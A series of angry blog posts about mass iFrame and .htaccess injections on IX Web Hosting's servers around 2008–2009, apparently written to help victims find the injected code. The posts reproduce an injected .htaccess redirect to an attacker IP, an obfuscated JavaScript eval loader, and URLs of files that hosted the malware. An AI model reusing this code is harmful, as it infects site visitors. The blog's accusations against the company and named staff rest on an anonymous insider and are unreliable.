IX Web Hosting, Script Injection and banned by Google 2
So many people being banned by Google, and cannot find the source of the Injection..
I have previously posted on this blog WHY you cannot find the code.. Because the code is NOT on your page. The code is, and can be anywhere on the server ( I have posted 3 links to the code that was hidden as a .jpg) The code added to your site is actually an Iframe, so what you should be looking for is a small snippet of code that calls the script. ( check your Config, Header, Footer, Index.php etc.. ALL pages that get called on every page
Yesterday someone contacted me with this issue, and that person was also banned by Google, and had spent weeks trying to solve this problem.. They finally found the code in the CONFIG File . ( thanks to this blog)
The site is now clean, but it will only be a matter of days before it is injected AGAIN!!
Here is the post I posted in December last year:
Hundreds of IX customers, are contacting me to ask about the Injected script ( posted in a previous post) they are asking me HOW to remove it, because they cannot find it…
The Reason they cannot find it??
Because of a MASSIVE SECURITY ISSUE on IX WEB HOSTING’s SERVERS!!.. the script is NOT actually put onto any of your pages, the script is actually hidded somewhere on the server..
So far I have found 5 “seeds” .. These are the codes that are appearing in over 100,000 sites
( These have now been removed by ix web hosting but as you can see, the actual file is well hidden and disguised as an image. REMEMBER, this is where the files were stored that YOU can see on YOUR pages )
- http://on3photo.com/onlinestore/photos/106-firefighter_foto/1147-gustav_deployment/di_img_0002.jpg
- http://adventuresinstorytelling.com/modlogan/m_usage_200603_001_008.html
Remember to view the “source code” in the above links.
Very interesting is the second “seed” that is actually in an IX standard “modlogan” folder, that is standard a chmod 700 .
Secondly it should not be possible on any shared server to inject this script onto EVERY file on that server. The fact that this is happening means that IX web Hosting has not got a clue how to protect their servers, and customer web sites.
So as you can see, this script IS NOT actually put into your script, that is why you cannot find it.. HOWEVER, somewhere on your site, there is a bit of code ”Calling” this script, and that appears in your pages.
Check ALL the pages that get called for every page, ie. header, footer, index, config, sidebar etc.So far I have evidence and proven that the following IX servers running the following Database’s are seeded:
- mysql33.ixwebhosting.com
- mysql15.ixwebhosting.com
- mysql27.ixwebhosting.com
If you know of any others that are seeded, please let me know.
Hope this helps
:: Some people have contacted me to tell me that the Injected Script is ( also ) injected into the database, and in some cases a new table is created.
I have checked 9 databases of infected sites, and I have not yet come across the script in my Database’s, so I think that this might be “script” related, maybe that some scripts such as PhpBB2 allows for this to happen, so I recommend searching your Database for the script as well ::=================================================================
This issue has now been going on for more than 10 months…. 1 year this May.. Will IX Web Hosting be celebrating this milestone?
IX Web Hosting has SERIOUS database Issues and lots more
In the past months, 1000’s of IX Web Hosting’s customers finally turned their back on the “Cheap, Unreliable and Insecure ” Web Host. This was due to the fact that more than 140,000 sites were hacked and injected on a WEEKLY bases, things got so bad that even the “Backups” were infected and deemed useless.
From May 2008 onwards IX Web Hosting continueously blamed their customers, mayor search engines, WordPress, Joomla, and every script on the market, actually, it was everyone’s fault, except IX Web Hosting.
The past 4 weeks I have recieved and seen an alarming amount of customers furious about the “Downtime” of their sites.
Downtimes of 6+ hours is normal…
I am curious who IX WEB HOSTING is going to blame this time
| Shira, 12th 2009f February, 2009 | ||||||||||||||||||||||
We’ve spent the last week uploading and creating database on our new IXWebhosting account. BIG MISTAKE. All of the database sites give random server connection errors more often than not and the server service in general is extremely unreliable. The online “Tech support” chat is a complete joke. Not once have they been able to resolve the problems we’ve communicated, and we have to chat them about 5 times a day. We’re closing our account today before serious damage is done.
|
IX Web Hosting’s PHP Upgrade Notification
Dear Nicole **********,
We are happy to inform you that over the next two weeks we will upgrade PHP to the latest 4.x version (4.4.9) on the web server your website is currently being hosted on. This upgrade will resolve many security exploits and make services more stable.
As part of this upgrade, we will migrate from an Apache Module to a CGI based installation that gives you more control over many PHP settings. Once implemented, you will have the ability to upload your very own php.ini file into your cgi-bin folder as needed.
After the upgrade, your website may experience a few errors, all of which can be quickly resolved. Most are caused by having PHP directives inside an .htaccess file.
To fix this problem, simply login to your control panel and click on the WebShell icon. The .htaccess file will not be viewable unless you have “show hidden files” checked in your WebShell settings. Open the .htaccess file and remove any lines that start with “php_”. If you need to retain these settings, then they must now go into a php.ini file and placed into your cgi-bin folder.
If you are running PHP in any of your HTM/HTML files, please add this line to your .htaccess file:
AddHandler php-script .php .php3 .php4 .htm .html .phtml
If you have any questions or concerns about this upgrade, please do not hesitate to contact us 24/7 via live chat, ticket, or phone support and we will be glad to assist.
I hope you will enjoy the new features and increased security!
Best Regards,
Fatima Said, CCO
IX Web Hosting
IX Web Hosting making money from their INSECURE SERVERS
For going on 10 months now ix web hosting’s servers have been under attack, both the older php4 and the new php5 are full of security issues, and have been seeded and are constantly injected with various scripts and / or the .htaccess file gets renamed and customer sites are re-directed.
MORE than 120.000 IX hosted sites are injected / .htaccess hacked on a weekly basis, an excellent oppertunity for the scum IX to make a quick buck!!
IX Web Hosting will clear up the mess that is caused by their extreme Incompetence and INSECURE SERVERS for just $80 AN HOUR!!
A few days ago I was contacted by an IX customer that hosted 5 html sites ( not a single script) all 5 websites were injected with the Yahoo Counter Script, this was the 3rd time in one month that this had happened, each time she just re-uploaded all her sites, but still her sites got injected. The 4th time she approached IX to help her get her sites back in order. IX charged her $160 ( 2 hours) to get her sites back to normal. 6 DAYS later all her sites were injected, but luckily the bastards at IX were willing to help her again for another $80 an hour.
Is YOUR site INFECTED by the Yahoo Counter or .htaccess
A lot of people are contacting me, asking HOW you would know if your site is infected?.
Let me start by saying that in some cases you will know immidiately when somthing is wrong, but in other cases it might not be too clear.
The YAHOO COUNTER SCRIPT
Click Image to Enlarge
is an iFrame Javascript injection that injects code into the Footer, Body, or Header, or all three at once.
Thousands of IX web Hosting customers are infected with this code, and they do not even know it! The web Page looks normal, but this can be very dangerous, your website will eventually drop from ALL the mayor search engines, and your domain will be flagged as “Dangerous Malware” by all the search engines.
To check if you have the Yahoo Counter injected, visit any search engine, and visit your site, If your site loads as it should, BUT it still shows “Loading” in the taskbar for some time, and then in most cases ( but not always) an ” Acrobat Reader” Error message will pop up.
Now you must Check the “Source Code” ( Menu Bar –> View –> Source ) and you will notice the Code that has been injected.
The .htaccess Injection
This is a very sneaky Injection, the reason being, is because most people that have and check their websites, access them by either a shortcut, or directly through the search bar by using the url, In both these cases, your website will be perfectly normal, BUT, anyone trying to access your website through any of the mayor Search Engines, will be re-directed.
Click Images to Enlarge
Once that is done, a FAKE ANTI VIRUS will pop up, and start scanning your PC, it will then alert you that you have dangerous files on your PC, and if they should be removed, if you click YES, you are screwed!!, a Trojan with KeyLogger will be executed on your PC, and you are INFECTED!!…
Anyone who has the FAKE ANTI VIRUS pop up, should just click off the site NEVER click “Yes” or “No”.. just click OFF the page , if your PC freezes, use “Ctrl-Alt-Delete” and Stop the process… then out of precaution you can “Delete” your cached internet files.
An example of the injected .htaccess file.
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* h**p://87.248.180.89/topic.html?s=s [R,L] ( link altered by ME )
Remember, you only get re-directed if you click on your url from a search engine
IX Web Hostings Servers using both Php4 and Php5 INFECTED
As I wrote yesterday, MORE THAN ONE THIRD OF ALL IX Web Hosting’s hosted sites are INFECTED.
And to make things worse, the problem is spreading.
Up until Jan. 3rd 2009 it was only the older servers still running Php4 that were being affected, but now even the NEW server blocks, running Php5 are being injected.
IX Customers with sites on the server block with mysql address mysql501.ixwebhosting.com that runs php5. are being injected.
This is bad enough, and the fact that after 9 MONTHS!!! IX Web Hosting has still NOT GOT A CLUE how this is being done is a complete DISGRACE!!
And to add salt to the wounds, IX is not just being attacked with one form of iFrame injection, NO, IX is being attacked THREE different ways.
1) The notorious ” YAHOO COUNTER” is being injected into the FOOTER of every file.
2) The .htacces File that is overwriting and / or adding an . htaccess file into the root of every site and re-directing sites
3) As of Jan. 3rd 2009, a SECOND but modified version of the ” YAHOO COUNTER ” iFrame injection is now being injected into BOTH the Header, AND / OR Body of every file.
Today an IX Web Hosting customer sent me a link to their site, that was injected with THREE Yahoo Counters, Header, Body and Footer.
The owner of the site told me that the site would take ages to load, and would often even timeout, and Google had dropped the site completely from the Search Engine, penalized because of the “Malware Script”
Here is a quote from IX Support’s Alex Karamushko :
We have currently problem with Yahoo counter hack, but our system administrators and security analysts working hard for finding exact reason of that problem and we can assure you that this will be fixed shortly.
After 9 months, I ask myself what ” shortly” actually means?!.. Another week?, month?, or maybe 3 months?.. because I was told by “AGENT IX” that at the rate things are going now, by May 2009 EVERY website hosted at IX will be infected by these injections.
IX Web Hosted sites Hacked & Defaced Jan 9th 2009
More than ONE THIRD of ALL IX Web Hosting sites INFECTED
A lot of the information I post here, I get from a person that works for IX Web Hosting and / or Ecommerce, as you all understand I cannot give any details that could compromise his / her position. I will call this person “AGENT IX”
Today I recieved an Email from “AGENT IX” that states that more than 100,000 IX Web Hosting Sites are infected.
The Details are, that IX Web Hosting is hosting 285,223 websites ( source http://whois.domaintools.com/ixwebhosting.com
More than 100,000 sites are infected, which means that more than 1/3 of all IX Web Hosting sites are infected!!
and IX has still not got a clue how to stop these attacks.
Also the injected script(s) are changing ( see previous posts) which most likely means that this vulnerability is now being exploited by various people / groups, and this also means that this problem is going to get a lot worse before it gets better, this problem has now been effecting sites since last year May ( 2008 ) almost 9 MONTHS LATER the problem is worse than it has ever been, and there is no bright light at the end of the tunnel yet.
A NEW wave of iFrame Injections for IX Web Hosts Customers
It has come to my attention that a NEW wave of iFrame injections has infected 1000’s of new IX Web Host Customers, unlike the previous injection, that injected javascript into the footer of every file, this new piece of code is being injected into the “Header” of every file..
The new code looks like this:
<script language=JavaScript>function tobnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,62,45,0,25,55,44,41,2,31,0,0,0,0,0,0,3,38,33,21,20,16,19,10,42,35,13,32,24,17,4,40,46,56,53,
15,60,5,50, 47,57,48,51,0,0,0,0,26,0,49,6,29,7,12,54,34,23,28,58,11,14,36,43,27,8,59,52,39,37,30,61,1,18,22,9);for(s=Math.ceil(c/m);s>0;s–){h=”;for(i=Math.min(c,m);i>0;i–,c–){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(224^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}tobnb25(’hAOIN1QtlSztwx4tFfvam1OIUuTfN1QKCfLBlx7ZhG4gDypVdZcgbG4KJypYlbLIUfcf4FLrE@TmxlL
58IptD87fS0TRF84BUxOZzjOBS1etS0vak5_KD gOZx1LtlxpV2bptpj6mwjpBSfpVzneRCkJRLsTVdscfNbJrdWTa8@TtzxptpfJRDIJYpyLgdgptcdJrM
@TmDAzIUf2YNAQmEVLK4H2ISjLB8qJ5SsOBxbLIUjvaz@’)</script><!– yourdomain.com –>
Manager Kenny at IX Web Hosting informed a customer today ( Mon 5th Jan.) that they were testing right now and should be completed in a week or two…
ONE OR TWO WEEKS!!!.. Hey we have been waiting for 8 MONTHS!!!! You would think that by the advice is giving all their paying customers, and blaming them for everything, and then offering to fix the problem for $80 AN HOUR!!.. that they would know how to fix this problem, but is is clear they do not, and instead of putting more time and effort into solving this, what does IX do??… TRY AND MAKE MONEY FROM THE PROBLEM!!!… Thats correct, IX Web Hosting is offering to fix / clean customer sites for $80 an hour!!… This is an absolute disgrace!!
To me it is clear that a large group of people know the vulnerability at IX servers, and various people are now injecting their own script, thats why we are starting to see various different scripts appearing.
IX Web Hosted Sites Hacked and Defaced Jan. 2nd 2009
- http://forums.spartiate-peers.com/
- http://www.washrag.org/phpBB2/index.php
- http://www.pococks.net
- http://imprecator.net/
- http://imprecator.net/
- http://www.capetowntips.com/
- http://countrydataservices.com/
- http://releasespy.com/forum/viewforum.php?f=13
- http://nickersonpianostudio.com/
- http://strangeauction.com/
- http://temp.simplyenticing.com/
- http://vavize.com/
- http://utilizesports.com/
- http://www.commandoes.us/
- http://www.neostudios.co.uk/lucypinder/
- http://tommygallagherband.com/index.php?option=com_gigcal&Itemid=30
- http://thatsmydiary.info/
- http://greenlaser.cn/
- http://www.elfankosh.com/admin.php
- http://ircai.com/
IX web hosted sites Hacked and Defaced December 29th
- http://abcnepal.com/phpBB2/
- http://forums.adeptpcs.com/
- http://www.defaceadd.org/tamekran-767.xml
- http://mallusworld.com/
- http://sw.rzep.net/
- http://myxxonline.com/phpBB2/
- http://happyzoo.com/phpBB2/admin/
- http://yojils.com/forums/
- http://dj-booth.co.uk/forum/
- http://firstbaptist-nyc.org/phpBB2/
- http://webaccess.ingenious.cc/phpBB2/
- http://infrastructurematters.org/phpBB2/
- http://everythingretek.com/phpBB2/viewtopic.php?p=1464
- http://plus.rawfishrecords.com/phpBB2/
- http://quellederjugend.arhaco.com/phpBB2/
- http://mediawirx.net/phpBB2/
- http://www.zavallis.com/
- http://www.nassel.com/news/
- http://www.joshstern.net/phpBB2/viewtopic.php?p=13422..13422
- http://northharrowsnooker.co.uk/
IX Web Hosting and the Yahoo Counter Script Injection
I started this blog just 2 weeks ago, and today I recieved my 1000 th Email asking me about the code that is injected into the footer of every file hosted on seeded IX Web Hosting Servers.
Hundreds of IX customers, are contacting me to ask about the Injected script ( posted in a previous post) they are asking me HOW to remove it, because they cannot find it…
The Reason they cannot find it??
Because of a MASSIVE SECURITY ISSUE on IX WEB HOSTING’s SERVERS!!.. the script is NOT actually put onto any of your pages, the script is actually hidded somewhere on the server..
So far I have found 5 “seeds” .. These are the codes that are appearing in over 100,000 sites
- http://on3photo.com/onlinestore/photos/106-firefighter_foto/1147-gustav_deployment/di_img_0002.jpg
- http://adventuresinstorytelling.com/modlogan/m_usage_200603_001_008.html
Remember to view the “source code” in the above links.
Very interesting is the second “seed” that is actually in an IX standard “modlogan” folder, that is standard a chmod 700 .
Secondly it should not be possible on any shared server to inject this script onto EVERY file on that server. The fact that this is happening means that IX web Hosting has not got a clue how to protect their servers, and customer web sites.
So as you can see, this script IS NOT actually put into your script, that is why you cannot find it.. HOWEVER, somewhere on your site, there is a bit of code ”Calling” this script, and that appears in your pages.
Check ALL the pages that get called for every page, ie. header, footer, index, sidebar etc.
So far I have evidence and proven that the following IX servers running the following Database’s are seeded:
- mysql33.ixwebhosting.com
- mysql15.ixwebhosting.com
- mysql27.ixwebhosting.com
If you know of any others that are seeded, please let me know.
Hope this helps
:: Some people have contacted me to tell me that the Injected Script is ( also ) injected into the database, and in some cases a new table is created.
I have checked 9 databases of infected sites, and I have not yet come across the script in my Database’s, so I think that this might be “script” related, maybe that some scripts such as PhpBB2 allows for this to happen, so I recommend searching your Database for the script as well ::
IX and Hacked and Defaced Dec 24 2008
A short list of sites hosted by IX Web Hosting.. all Hacked and Defaced
http://www.strangeauction.com/wp-login.php
http://annualkellyfamilyreunion.com/forum/
http://sisterwords.com/phpBB2/
http://cr30beachbungalow.mmisiolek.com/phpBB2/
http://hitecpowercontrols.com/x.html
http://jacksonvilleyardsalesonline.com/signinform.php?msg=%3Ch1%3EHacked%20By%20BeLa%3C/h1%3E
http://abacusdiesel.com/phpBB2/
http://www.cardstuff.info/details.php?id=16&kategorie=9&main_kat=4&start=0&nr=
http://mediaportalen.net/index.php?n=modules/users&s=4&t=DESC&p=1&l=results_poll&68cac=off
http://forgottenstory.com/phpBB2/
http://www.mobileintegration.no/
http://krabbeteiner.com/shop/admin/
http://fischertechnologies.com/calendar/
26,991 IX Web hosting customers infected
Dear Nicole,
In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.
We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.
While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:
1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/malware-removal/uninstall-antivirus-2009
2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.
To illustrate the severity of the issue I would like to share some facts with you:
* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system
We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.
If you have questions regarding any of this information, please contact our support team anytime.
Kind Regards,
Fatima Said, CCO
IX Web Hosting
h**p://www.ixwebhosting.com
******************************************************
WOW!!!… Let’s break this down..
-
In our ongoing commitment to the security of our customers
Well at least they have a sense of humor -
we have discovered a vulnerability located within many of our client’s websites, including yours.
Actually us customers dicovered this SIX MONTHS AGO!! -
This is a self replicating virus which is found by visiting well-known search engines
Hahahaha… so first they blame the customers, now they are blaming all the mayor search engines.. -
At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website.
Yeahhhh, I know exactly what you are thinking!!.. and Yes it is these idiots that are running IX web hosting … If you believe this, you’ll believe anything. -
We have dedicated our systems administration team to finding a solution.
Yeahh Right, thats like trying to get a lead balloon to fly!! -
To illustrate the severity of the issue I would like to share some facts with you:
* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system
What can I say?, 26,991 customers fault.. Ooohh and let’s not forget Google.. -
We are proud to say that we are among the first web hosts to identify this particular problem
What this really means, is they are proud of themselves, for being able to bullshit their customers into thinking it’s the customer and Google’s fault. -
and have been the first to offer a resolution.
So these incompetent retards, think that blaming others for their incompetence, and wasting their time by having them download junk, and scan their PC … a Resolution?? -
If you have questions regarding any of this information, please contact our support team anytime.
I think I would rather have someone use my eyeballs as pin cushions than have to deal with the Notourious IX Web Hosting Support .. thats like tring to wipe your arse with your teeth!!
-
Archives
- November 2009 (1)
- October 2009 (3)
- July 2009 (1)
- May 2009 (4)
- March 2009 (3)
- February 2009 (7)
- January 2009 (12)
- December 2008 (19)
-
Categories
-
RSS
Entries RSS
Comments RSS
